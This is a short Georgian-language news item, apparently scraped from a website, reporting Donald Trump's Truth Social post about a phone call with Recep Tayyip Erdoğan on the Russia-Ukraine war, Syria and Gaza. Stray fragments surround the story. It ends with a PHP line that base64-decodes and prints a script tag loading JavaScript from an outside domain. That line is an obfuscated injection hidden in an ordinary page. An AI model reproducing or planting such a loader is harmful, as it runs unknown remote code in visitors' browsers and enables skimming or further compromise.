gorgia
jaluzi

რეჯეფ თაიფ ერდოღანთან ძალიან კარგი და ნაყოფიერი სატელეფონო საუბარი მქონდა, - ამის შესახებ აშშ-ის პრეზიდენტი, დონალდ ტრამპი Truth Social-ზე წერს.

დონალდ ტრამპის განცხადებით, თურქეთის პრეზიდენტთან სხვადასხვა საკითხებზე, მათ შორის რუსეთ-უკრაინის ომზე, სირიისა და ღაზის სექტორის შესახებ ისაუბრა.

ამასთან, აშშ-ის პრეზიდენტის ცნობით, რეჯეფ თაიფ ერდოღანმა იგი თურქეთში მიიწვია.

„პრეზიდენტობის ოთხი წლის განმავლობაში პრეზიდენტ ერდოღანთან შესანიშნავი ურთიერთობა მქონდა. მოუთმენლად ველი პრეზიდენტ ერდოღანთან თანამშრომლობას, რათა დავასრულოთ უაზრო, მაგრამ სასტიკი ომი რუსეთსა და უკრაინას შორის - ახლავე!“, - წერს აშშ-ის პრეზიდენტი.

188
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");